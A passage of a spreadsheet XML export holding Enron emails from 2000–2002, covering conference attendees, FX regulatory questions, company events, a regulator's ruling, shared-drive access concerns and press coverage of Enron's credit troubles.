&gt; &lt;robin@risk.co.uk&gt;_x000D_
&gt; Sent: Friday, September 08, 2000 4:23 AM_x000D_
&gt; Subject: Re: VaR Article_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt; Les,_x000D_
&gt; &gt;_x000D_
&gt; &gt; The revised version  of the VaR article looks fine._x000D_
&gt; &gt;_x000D_
&gt; &gt; Vince_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
_x000D_
 - EPRM_04_sim_mr.zip</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 04:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'drkubala@thompson-grp.com', 'mstewart@pdq.net', 'stewart@mallia.com', 'jason.d.moore@carrier.utc.com', 'scottsmith@masterword.com', 'tswick@lcc.net', 'joe.stepenovitch@enron.com', 'jebert@eadslink.com', 'michael_j_newman@reliantenergy.com', 'twilliams17@hotmail.com', 'jkuehler@wecon.com', 'chadpol@aol.com', 'duck@pdq.net', 'kayne.coulter@enron.com', 'dean.laurent@enron.com', 'o_briandave@hotmail.com', 'j.purdom@worldnet.att.net', 'jason.choate@enron.com', 'matt.lorenz@enron.com', 'seanpat@flash.net', 'larry.campbell@enron.com', 'c.wilson@mail.utexas.edu', 'wayne.herndon@enron.com', 'rudy.acevedo@enron.com', 'stichavsky@pct-inc.com', 'kenneth.d.schall@us.arthurandersen.com', 'greg.trefz@enron.com', 'lenamonj@us.cibc.com', 'travieso74@hotmail.com', 'richard.hrabal@enron.com', 'keller.mayeaux@enron.com', 'tina.triolo@jacobs.com', 'prhe@dynegy.com', 'edwino@baseline.com', 'tbanks@cbre.com', 'john.kinser@enron.com', 'stdfmn@shsu.edu', 'souto@stthom.edu', 'reidstav@houston.rr.com', 'adamon@dttus.com', 'david_nobles@ewingcc.com', 'twomarshalls@hotmail.com', 'gsnapka@pdq.net', 'rpearson@oilstates.com'})</t>
  </si>
  <si>
    <t>How to discourage harassment in the office!!!!!!!!!!!!!!</t>
  </si>
  <si>
    <t xml:space="preserve"> - How to discourage harassment in the office.mpeg_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Aug 2001 06:45:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>IPAC</t>
  </si>
  <si>
    <t>http://cnet.com/hardware/0-2709830-404-1781522.html?tag=st.co.2645869-7-1480990.topfive.2709830-404-1781522</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 06:10:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: CERA California Summit</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff -- _x000D_
_x000D_
Are you going?  The list looks pretty good.  If not, we may need to have someone there._x000D_
 _x000D_
Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Thome, Jennifer _x000D_
Sent: Wednesday, August 08, 2001 8:57 PM_x000D_
To: Dasovich, Jeff_x000D_
Cc: Steffes, James D.; Guerrero, Janel_x000D_
Subject: FW: CERA California Summit_x000D_
_x000D_
_x000D_
Jeff:_x000D_
 _x000D_
Below is a list of expected attendees at the CERA meeting at La Costa.  _x000D_
The price is $2,500 (sorry, manicures not included!)_x000D_
 _x000D_
Jennifer_x000D_
_x000D_
-----Original Message----- _x000D_
From: David Gibbons &lt;dgibbons@CERA.com&gt;@ENRON _x000D_
Sent: Wed 8/8/2001 8:33 PM _x000D_
To: Thome, Jennifer _x000D_
Cc: _x000D_
Subject: California Summit_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jennifer, _x000D_
_x000D_
Here's a partial list of some notable registrants for the upcoming Summit. _x000D_
_x000D_
Hope you're able to make it. _x000D_
_x000D_
Dave _x000D_
_x000D_
- Federal Energy Regulatory Commission: Dan Larcamp (or designee), Director, Office of Markets, Tariffs and Rates _x000D_
_x000D_
- Nevada Public Utilities Commission: Commissioner Richard M. McIntire _x000D_
_x000D_
- California Energy Commission: Chairman William Keese _x000D_
_x000D_
- Arizona Corporation Commission: Commissioner Marc Spitzer _x000D_
_x000D_
- Pennsylvania Public Utility Commission: Chairman Glen Thomas _x000D_
_x000D_
- Florida Public Utility Commission: pending confirmation _x000D_
_x000D_
- Texas Public Utility Commission: pending confirmation _x000D_
_x000D_
- U.S Department of Energy: Jimmy Glotfelty, Advisor to Secretary Abraham _x000D_
_x000D_
- Federal Trade Commission: Commissioner Thomas Leary _x000D_
_x000D_
- Electric Power Supply Association: Executive Director Lynn Church _x000D_
_x000D_
J. Stuart Ryan, Executive Vice President, AES Corporation _x000D_
_x000D_
Ray Spitzley, Managing Director, Morgan Stanley _x000D_
_x000D_
Christopher Lowe, Vice President, JP Morgan _x000D_
_x000D_
Dougl W, Kimmelmann, Managing Director, Investment Banking, Goldman Sachs Gary Rodford, Senior VP, BC Hydro _x000D_
_x000D_
Cheryl Muench, VP, Black &amp; Veatch _x000D_
_x000D_
Gary Lavey, General Manager, Global Risk Management, Cinergy _x000D_
_x000D_
Grady Blakley, VP, Engineering &amp; Construction, El Paso Energy _x000D_
_x000D_
Ron Litzinger, Senior VP, Worldwide Operations, Edison Mission Energy _x000D_
_x000D_
Terry Bundy, Administrator &amp; CEO, Lincoln Electric Systems _x000D_
_x000D_
Armando Olivera, Senior VP, Power Systems, FP&amp;L _x000D_
_x000D_
Stan Marks, VP, North America, NRG _x000D_
_x000D_
Tom Patrick, President &amp; CEO, Peoples Energy _x000D_
_x000D_
Jack Farley, President, West Region, North America, Reliant Energy _x000D_
_x000D_
Curtis Morgan, President East Region - North America, Reliant Energy _x000D_
_x000D_
Tim Leyshock, Senior VP, Siemens Power Transmission and Distribution _x000D_
_x000D_
Denise Russell, Director, Market Analysis, Williams Energy Mktg &amp; Trading </t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 16:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>=?ANSI_X3.4-1968?Q?Mind=01,s_Eye_Madness_-_April_24th_-_27th?=</t>
  </si>
  <si>
    <t>Introducing Mind=01,s Eye Madness... a "Celebration of Innovation"! =20_x000D_
=20_x000D_
Enron. A name synonymous with innovation.  A company named "Most Innovative=_x000D_
=20_x000D_
Company in America"=20_x000D_
for the 6th consecutive year by Fortune magazine.  What inspires this=20_x000D_
innovation?  Find out at Mind's Eye Madness!_x000D_
=20_x000D_
With a view to highlight advancements in technology, new businesses at Enro=_x000D_
n=20_x000D_
and the importance of being yourself,=20_x000D_
this week-long celebration will take place in the Enron Building lobby duri=_x000D_
ng=20_x000D_
lunchtime from Tuesday, April 24th=20_x000D_
through Friday, April 27th.  More details to follow via e-mail and ETV!_x000D_
_x000D_
There are several related afternoon workshops and activities planned that=_x000D_
=20_x000D_
require reservations as listed below:_x000D_
_x000D_
=01&amp;Images of Enron in 2020" with Dr. Peter Bishop and Amy Oberg=20_x000D_
Tuesday, April 24th - 1:30pm to 3:30pm =20_x000D_
Join Amy Oberg with EES and Dr. Peter Bishop, Chair &amp; Professor of the=20_x000D_
University of Houston's Future Program,=20_x000D_
to imagine Enron in the year 2020. "Futures tools" will be utilized to=20_x000D_
consider Enron's=20_x000D_
characteristics, culture, businesses and the world environment.  You will=_x000D_
=20_x000D_
also explore how the future might play out for Enron. =20_x000D_
_x000D_
"The Painting Experience" with Mr. Stewart Cubley=20_x000D_
Thursday, April 26th - 3:30pm to 5:30pm_x000D_
You do not have to be an artist... no training or knowledge of art is=20_x000D_
required....  simply participate in a unique,=20_x000D_
supportive environment where you can explore the =01&amp;process=018 of creativ=_x000D_
ity and=20_x000D_
risk-taking completely free from the=20_x000D_
barriers of comparison, evaluation, judgment, success, failure or awards. =_x000D_
=20_x000D_
The only prerequisite is a spirit of inquiry. =20_x000D_
_x000D_
The Enron Mind=01,s Eye Motorcade_x000D_
Friday, April 27th - 9:00am to 1:00pm and 1:00pm to 4:00pm=20_x000D_
The Enron Mind's Eye Motorcade is an art car convoy sponsored by Enron.  It=_x000D_
=20_x000D_
will visit Enron-designated stops=20_x000D_
in the community including our adopted schools, non-profit organizations an=_x000D_
d=20_x000D_
medical center=20_x000D_
facilities dedicated to treating children.   Enron employees are needed to=_x000D_
=20_x000D_
accompany the convoy and interact with=20_x000D_
the community by communicating the importance of innovation.   When=20_x000D_
registering, please designate your time preference._x000D_
_x000D_
There are no registration fees for any of these activities and space is=20_x000D_
limited. =20_x000D_
To RSVP or for more information, please contact Jessica Nunez at x31918._x000D_
_x000D_
Remember to visit the lobby during lunch for an exciting exchange of relate=_x000D_
d=20_x000D_
information!</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 09:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'donna.lowry@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Re: FX Transactions</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Trena McFarland/LON/ECT on 10/08/2000 _x000D_
16:07 ---------------------------_x000D_
_x000D_
_x000D_
Jon Barrett@MGLTD_x000D_
10/08/2000 06:38_x000D_
To: Justin Boyd/LON/ECT@ECT_x000D_
cc: Trena McFarland/LON/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Alan _x000D_
Aronowitz/HOU/ECT@ECT, Marcus Nettelton/NA/Enron@ENRON, Kevin _x000D_
Rhodes/MGLTD_London/MGLTD@MGLTD, Alfred Pennisi/NYC/MGUSA@MGUSA, Tim _x000D_
Poullain-Patterson/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: FX Transactions  _x000D_
_x000D_
Justin_x000D_
_x000D_
Our understanding is that FX traded from the US is effectively unregulated. _x000D_
If we use MG London Inc, there would be the possibility that the CFTC would _x000D_
have some type of oversight on the unregulated business. Only the posting of _x000D_
the IMM EFPs needs to be done through the FCM._x000D_
_x000D_
There are other practical issues here in that that MG London Inc currently _x000D_
lacks the infrastructure needed to do the outright FX business as it has no _x000D_
bank FX lines and no bank accounts for all the currencies. There are other _x000D_
issues where the main settlements/back office expertise is here in London. _x000D_
These are obviously not insurmountable but we need to do a lot of work to get _x000D_
either MG London Inc or, for example, MG Newco Inc ready for the business. Is _x000D_
there an angle for using Enron North America, for example, as I understand _x000D_
they already have existing FX lines and settlements or would that be a _x000D_
non-starter? There are currently some UK and EU customers on Wolff's books _x000D_
who would need to be routed via an SFA regulated arranger. Will we be able to _x000D_
use EEFT for this?_x000D_
_x000D_
Rgds_x000D_
_x000D_
Jon_x000D_
_x000D_
_x000D_
_x000D_
Justin Boyd@ECT_x000D_
09/08/2000 18:54_x000D_
To: Jon Barrett/MGLTD_London/MGLTD@MGLTD_x000D_
cc: Trena McFarland/LON/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Alan _x000D_
Aronowitz/HOU/ECT@ECT, Marcus Nettelton/NA/Enron@ENRON _x000D_
_x000D_
Subject: Re: FX Transactions_x000D_
_x000D_
Jon,_x000D_
_x000D_
I had a glance over the written paper from Sullivan &amp; Cromwell as to FX _x000D_
Transactions, and it seems to me that there would be fewer US regulatory _x000D_
issues (should there be any), if we were to use MG Brokers Inc, the FCM _x000D_
entity.  Are there any other reasons why we would not want to use this entity?_x000D_
_x000D_
[Mark/Alan/Marcus - I have separately sent you by email the Sullivan &amp; _x000D_
Cromwell paper]_x000D_
_x000D_
Thanks._x000D_
Justin_x000D_
_x000D_
---------------------- Forwarded by Justin Boyd/LON/ECT on 09/08/2000 18:49 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Jon Barrett@MGLTD_x000D_
09/08/2000 16:37_x000D_
To: Justin Boyd/LON/ECT@ECT, Janine Juggins/LON/ECT@ECT_x000D_
cc: Trena McFarland/LON/ECT@ECT, Kevin Rhodes/MGLTD_London/MGLTD@MGLTD, Sid _x000D_
Tipples/MGLTD_London/MGLTD@MGLTD, Andrew Cornfield/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: FX Transactions_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jon Barrett/MGLTD_London/MGLTD on _x000D_
09/08/2000 16:36 ---------------------------_x000D_
From: Alfred Pennisi@MGUSA on 09/08/2000 06:50 EDT_x000D_
To: Jon Barrett/MGLTD_London/MGLTD@MGLTD_x000D_
cc:  _x000D_
_x000D_
Subject: Re: FX Transactions  _x000D_
_x000D_
Jon, _x000D_
_x000D_
My suggestion would be for the FX business be run out of a NON FCM firm in _x000D_
the states (NY) since it is a non-regulated product. _x000D_
_x000D_
If you have an questions please call me at x5845._x000D_
_x000D_
regards,_x000D_
_x000D_
_x000D_
Alfred Pennisi_x000D_
MG London Inc._x000D_
520 Madison Avenue_x000D_
28th Floor_x000D_
New York, NY 10022_x000D_
Tel: 212.715.5845_x000D_
E-mail: alfred.pennisi@mglondon.com _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 09:00:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'khadiza.uddin@enron.com'})</t>
  </si>
  <si>
    <t>Livelink</t>
  </si>
  <si>
    <t>_x000D_
     Click on this url for Livelink access._x000D_
_x000D_
                     http://edms.livelink.enron.com/ena/livelink.exe_x000D_
_x000D_
Khadiza Uddin_x000D_
Enron NetWorks_x000D_
713-853-6001</t>
  </si>
  <si>
    <t>Thu, 29 Jun 2000 03:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Control</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 06/29/2000 _x000D_
10:41 AM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 06/28/2000 11:11:37 PM_x000D_
To: vkamins@enron.com_x000D_
cc:  _x000D_
Subject: Control_x000D_
_x000D_
_x000D_
 &lt;A HREF="http://www.europarl.eu.int/dg4/stoa/en/publi/166499/execsum.htm"&gt;STO_x000D_
A: Political control technologies - Summary of Interim Study&lt;/A&gt; _x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 03:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'franktholt@hotmail.com'})</t>
  </si>
  <si>
    <t>Are you going to Las Vegas today to see you mom or are you waiting to see if _x000D_
she gets better?  Can't get a hold of Barb on the cell phone.</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 07:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alfredo.huertas-rubio@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'mariano.gentilini@enron.com', 'paul.mead@enron.com', 'peter.styles@enron.com', 'jonathan.chapman@enron.com', 'paul.dawson@enron.com', 'eric.shaw@enron.com', 'michael.brown@enron.com'})</t>
  </si>
  <si>
    <t>I just came across this morning to some additional information from the _x000D_
regulator (CNE) regarding their motivations on its Arcos TPA ruling: _x000D_
_x000D_
1) Despite the current regulatory gaps, Enron's allegations were properly _x000D_
crafted, and made possible a way forward within the existing legal framework. _x000D_
The "two-sides commitment" idea suggested by Enron has been quite determinant _x000D_
because..._x000D_
_x000D_
2) ... the resolution fundamentally aims at making sure that the power plant _x000D_
is actually built (Enron finally commits), but also that new gas _x000D_
infrastructures start being developed asap!! There is clearly an underlying _x000D_
energy policy issue here, and this reasoning fits with the tight timescales _x000D_
imposed by the CNE to ratify our interest and signing the TPA contract. The _x000D_
resolution is seen by the CNE as a catalyser to put in track gas expansions _x000D_
and power plant investments._x000D_
_x000D_
Note that the CNE (and the Ministry) are testing if Enron is "truly" _x000D_
committed to put the money and invest by placing us in a no-return point _x000D_
(mine)._x000D_
_x000D_
Please, find below a full English translation of the CNE's ruling._x000D_
_x000D_
_x000D_
Of special interest, see sections III, VI, VII and IX of the GROUNDS FOR THE _x000D_
DECISION ADOPTED Chapter._x000D_
_x000D_
a.</t>
  </si>
  <si>
    <t>Sun, 6 May 2001 03:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Jazz in May, Europe tour</t>
  </si>
  <si>
    <t>Bill Beach, jazz piano for month of May and summer tour._x000D_
_x000D_
Sundays:_x000D_
06 w/ Dan Presley, Heathman Lodge, Vancouver, 5:30-9:00pm_x000D_
13 solo brunch, Heathman Lodge, Vancouver, 10:00am_x000D_
_x000D_
Mondays:_x000D_
7, 14 w/ Ron Steen Trio at Produce Row Cafe, SE 2nd &amp; Oak, 9:00pm to_x000D_
midnight_x000D_
_x000D_
Thursday:_x000D_
10, solo in London Grill at Benson Hotel, 5:30-9:30pm_x000D_
_x000D_
Friday and Saturday:_x000D_
11, 12, solo in London Grill at Benson Hotel, 6:00-10:00pm_x000D_
_x000D_
_x000D_
Europe Tour:_x000D_
begin May 19, Barcelona, Spain w/ Kelly Broadway Trio_x000D_
3 months, 16 countries on Royal Caribbean ship "Legend of the Seas"_x000D_
_x000D_
August 10, Harwich, England, begin motorcycle tour._x000D_
_x000D_
Email schedule will resume sometime in October._x000D_
_x000D_
thanks,_x000D_
_x000D_
Bill_x000D_
_x000D_
_x000D_
_x000D_
 - ship9.jpg</t>
  </si>
  <si>
    <t>Wed, 3 May 2000 03:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Chuck,_x000D_
_x000D_
Thank you for the information.  I have marked the dates on Jeff's calendar, _x000D_
and he plans to be there.  I guess he'll get more information as the date _x000D_
draws closer?_x000D_
_x000D_
Regards,_x000D_
Sherri_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Chuck Paul" &lt;chuck.paul@a-closer-look.com&gt; on 05/03/2000 09:58:49 AM_x000D_
Please respond to "Chuck Paul" &lt;chuck.paul@a-closer-look.com&gt;_x000D_
To: &lt;Jeff.Skilling@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Re: MS 150/ Homecoming 2000_x000D_
_x000D_
_x000D_
Sherri,  Homecoming is the Weekend of October 27-29.  I hope Jeff can make_x000D_
it!_x000D_
_x000D_
Chuck_x000D_
_________________________________________x000D_
   Chuck Paul_x000D_
   A Closer Look_x000D_
   Professional Mystery Shopping Company_x000D_
   770-446-0590_x000D_
   Email:  Chuck.Paul@A-Closer-Look.com_x000D_
   http://www.a-closer-look.com_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Jeff.Skilling@enron.com&gt;_x000D_
To: Chuck Paul &lt;chuck.paul@a-closer-look.com&gt;_x000D_
Sent: Wednesday, May 03, 2000 10:32 AM_x000D_
Subject: Re: MS 150/ Homecoming 2000_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; Mr. Paul,_x000D_
&gt;_x000D_
&gt; Jeff asked me to see if I could find out when the Homecoming is taking_x000D_
&gt; place.  He'd like to be there if the dates work with his schedule._x000D_
&gt;_x000D_
&gt; Thank you,_x000D_
&gt; Sherri Sera_x000D_
&gt; Assistant toJeff Skilling_x000D_
&gt; 713.853.5984_x000D_
&gt; 713.646.8381 (fax)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; "Chuck Paul" &lt;chuck.paul@a-closer-look.com&gt; on 05/02/2000 01:35:32 PM_x000D_
&gt;_x000D_
&gt; Please respond to "Chuck Paul" &lt;chuck.paul@a-closer-look.com&gt;_x000D_
&gt;_x000D_
&gt; To:   "Jeff Skilling" &lt;jskilli@enron.com&gt;_x000D_
&gt; cc:_x000D_
&gt;_x000D_
&gt; Subject:  MS 150/ Homecoming 2000_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Jeff,  how was the bike trek to Austin?  Hope you raised LOTS of $$$._x000D_
&gt; Great_x000D_
&gt; job you are doing!  My MS get together is next weekend (May 13th)._x000D_
&gt;_x000D_
&gt; Homecoming 2000-be there!  Elvis is having a party for all Beta's (big_x000D_
25th_x000D_
&gt; reunion) on Friday night at his house.  The new stadium is supposed to be_x000D_
&gt; awesome.  Hope you can make it._x000D_
&gt;_x000D_
&gt; Keep in touch,_x000D_
&gt;_x000D_
&gt; -kai-_x000D_
&gt;_x000D_
&gt; Chuck_x000D_
&gt; _________________________________________x000D_
&gt;    Chuck Paul_x000D_
&gt;    A Closer Look_x000D_
&gt;    Professional Mystery Shopping Company_x000D_
&gt;    770-446-0590_x000D_
&gt;    Email:  Chuck.Paul@A-Closer-Look.com_x000D_
&gt;    http://www.a-closer-look.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Feb 2002 13:01:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.sawyer@enron.com'})</t>
  </si>
  <si>
    <t>Shared Drive Concerns</t>
  </si>
  <si>
    <t>_x000D_
Lisa, Steve Harris suggested I share with you our concerns on the subject of "Shared Drives".  We had some problems on last week with deleted files on the TW_NNG Shared Drive -"S".  The Help Desk has resolved these problems, but in the process, we noticed that some of the files on the shared drive were still being viewed and updated by NNG's personnel over in Dynegy's offices.  _x000D_
_x000D_
Our concerns are such that some files should be viewed only by ETS, specifically TW.   Would you please check on this concern as soon as possible?_x000D_
_x000D_
If you would, please update me on the status of this request.  If you have additional questions concerning this problem, please do not hesitate to call me (x35849).  _x000D_
_x000D_
Thanks in advance for your prompt attention._x000D_
_x000D_
adr_x000D_
_x000D_
_x000D_
Audrey D. Robertson_x000D_
Transwestern Pipeline Company _x000D_
email address:  audrey.robertson@enron.com_x000D_
(713) 853-5849_x000D_
(713) 646-2551 Fax</t>
  </si>
  <si>
    <t>Sat, 22 Jan 2000 14:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Your review time</t>
  </si>
  <si>
    <t xml:space="preserve">Would you send me an amtel at 3:00pm Wed, Jan 26 about my review?_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kimberly Brown                           01/20/2000 07:49 AM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Scott Neal/HOU/ECT@ECT _x000D_
Subject: Your review time_x000D_
_x000D_
Your review will be Wednesday, Jan. 26 at 4:00, in EB 3084._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Dec 2000 06:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'john.lavorato@enron.com'})</t>
  </si>
  <si>
    <t>All CGPR exposure - Dec 28</t>
  </si>
  <si>
    <t>Note that the file has been updated for the 28th of December, as well as _x000D_
corrected for an error in the physical volume pickup.</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 09:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ETS State Government Affairs Report</t>
  </si>
  <si>
    <t>Yes (sort of).  I'm in Houston.  Up on 47.  What's up?</t>
  </si>
  <si>
    <t>Thu, 19 Jul 2001 08:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Restructuring Today Thursday July 19 2001</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 07/19/2001 01:34 PM -----_x000D_
_x000D_
	"US Publishing" &lt;season@restructuringtoday.com&gt;_x000D_
	07/19/2001 03:16 PM_x000D_
	Please respond to season_x000D_
		 _x000D_
		 To: "RT Reader" &lt;season@restructuringtoday.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Restructuring Today Thursday July 19 2001_x000D_
_x000D_
_x000D_
(see attached file:  rt010719.pdf)_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Season Hawksley_x000D_
US Publishing_x000D_
800-486-8201_x000D_
202-298-8201_x000D_
 - rt010719.pdf</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 07:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>enymexK Registration</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 05/10/2001 02:00 PM -----_x000D_
_x000D_
	NYMEX Customer Service &lt;CustCare@NYMEX.com&gt;_x000D_
	05/10/2001 12:52 PM_x000D_
		 _x000D_
		 To: _x000D_
		 cc: _x000D_
		 Subject: enymexK Registration_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;...OLE_Obj...&gt;&gt;   &lt;&lt;...OLE_Obj...&gt;&gt;_x000D_
_x000D_
Date: May 10, 2001_x000D_
_x000D_
Dear: enymexSM user_x000D_
_x000D_
_x000D_
In a previous e-mail we forwarded for your review an enymexSM registration_x000D_
information package. This consisted of both the enymexSM System User_x000D_
Agreement and examples of "click-on screens" that users will view and_x000D_
complete and agree to when they first log on to the enymexSM system. The_x000D_
enymexSM System User Agreement must be signed and returned to Robert A._x000D_
Dagistino, Director of Customer Service, New York Mercantile Exchange, One_x000D_
North End Avenue, New York, NY 10282._x000D_
_x000D_
In addition to the two documents previously sent, enymexSM trading companies_x000D_
will be required to fill out a single Registration Form.  This form is now_x000D_
available on the enymexSM website by clicking on to "How Do I Trade?" -_x000D_
"Getting Started - Registration for enymexSM". We request that you complete_x000D_
this registration form and submit it either on line or print out a copy and_x000D_
fax it to:_x000D_
(1) the clearing company you intend to use for the clearing of enymexSM_x000D_
trading  and;_x000D_
(2) the New York Mercantile Exchange, attention Robert  A. Dagistino at_x000D_
212-301-4555_x000D_
_x000D_
Any questions can be answered by contacting Robert A.  Dagistino via email_x000D_
at rdagistino@nymex.com or via telephone at 212-299-2429, or if you wish you_x000D_
may contact our Customer Service Call Center toll free at 1-866-enymexx_x000D_
(369-6399) or email to custcare@nymex.com. Thank you._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
Robert A. Dagistino_x000D_
Director of Customer Service_x000D_
New York Mercantile Exchange_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 04:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Transport contracts</t>
  </si>
  <si>
    <t xml:space="preserve">D-_x000D_
_x000D_
The Oasis contract #s are:  028 27099 201_x000D_
        028 27099 202_x000D_
        028 27099 203_x000D_
        028 27099 204_x000D_
_x000D_
PG&amp;E contract #s are: 5095-037_x000D_
   5098-695_x000D_
   9121_x000D_
   5203-010_x000D_
  _x000D_
PG&amp;E parking and lending contracts awaiting approval: PLE00004_x000D_
       PLA00004_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 14:03:28 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Trading Article</t>
  </si>
  <si>
    <t>FYI..._x000D_
_x000D_
_x000D_
Energy Cos Limit Business With Enron After 10Q -Traders_x000D_
By Mark Golden_x000D_
_x000D_
11/20/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
  NEW YORK -(Dow Jones)- Many energy trading companies were unwilling to sell_x000D_
power and natural gas for next day delivery to Enron Corp. (ENE) Tuesday_x000D_
morning, a result of heightened credit concerns following the release of_x000D_
Enron's quarterly financial report Monday, traders and other sources said._x000D_
_x000D_
  For weeks, companies have limited both buying and selling with Enron for_x000D_
future deliveries. But for the first time since Enron's troubles began a month_x000D_
ago, energy companies weren't selling to Enron in the spot markets for fear_x000D_
that Enron might not be able to pay its bills as soon as next month._x000D_
  "It's pretty well accepted in the industry that people are staying away for_x000D_
now," said Charlie Sanchez, energy market manager for Gelber &amp; Associates in_x000D_
Houston._x000D_
_x000D_
  Traders at all of the major companies contacted said they couldn't sell to_x000D_
Enron Tuesday morning. Several spokespeople for energy companies confirmed the_x000D_
situation, but declined to say so on the record._x000D_
_x000D_
  "Nobody will take Enron," one western electricity broker said. After_x000D_
struggling, however, that broker eventually found a utility that was willing_x000D_
to sell to Enron Tuesday morning._x000D_
_x000D_
  Calpine, a prominent independent power producer and trader, said it was_x000D_
willing to sell power to Enron._x000D_
_x000D_
  "We continue to sell power to Enron and are monitoring the situation_x000D_
closely," spokeswoman Catherine Potter said._x000D_
_x000D_
  The situation Tuesday morning was fluid. One utility that refused to sell to_x000D_
Enron in the morning was willing to do so in the afternoon, a person at the_x000D_
company said. That company's trading, however, was still limited to the spot_x000D_
markets._x000D_
_x000D_
  Credit concerns about the once-dominant energy trading company were_x000D_
heightened with Enron's filing of its third quarter annual report Monday_x000D_
evening with the U.S. Securities Exchange Commission._x000D_
_x000D_
  Enron may have to pay $690 million on a note that became a demand obligation_x000D_
with the company's most recent credit-rating downgrade, Enron said in Monday's_x000D_
filing. The company also warned that its profits in the fourth quarter could_x000D_
be hurt by credit concerns, a decline in asset values and reduced trading_x000D_
activity._x000D_
_x000D_
  "The 10Q in and by itself is a document that could raise concerns," Fitch_x000D_
analyst Ralph Pellecchia said. "We have a lot of questions outstanding_x000D_
relative to disclosures that were new to us and their strategies of how they_x000D_
are going to manage the situation."_x000D_
_x000D_
  Companies are willing to buy from Enron in the spot gas and power markets,_x000D_
because taking delivery on commodity and paying for it a month later poses no_x000D_
credit risk for the buyer.</t>
  </si>
  <si>
    <t>Wed, 11 Jul 2001 07:29:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hildago</t>
  </si>
  <si>
    <t>Keoni:_x000D_
_x000D_
We had another unpleasant experience with Hildago last night.  This is the =_x000D_
third different individual at EPMI who has had an interaction with him resu=_x000D_
lting in a hassle.  The other day I wrote it off to my fault, but since it =_x000D_
has happened with 2 other people here, and only with Hildago, I now believe=_x000D_
 the problem is him.  He has a natural antagonistic demeanor that makes peo=_x000D_
ple defensive and angry.  When he calls he accuses us of not meeting our ob=_x000D_
ligations and demands information and says things like, "if you do not prov=_x000D_
ide this information I will turn you in."   We understand our responsibilit=_x000D_
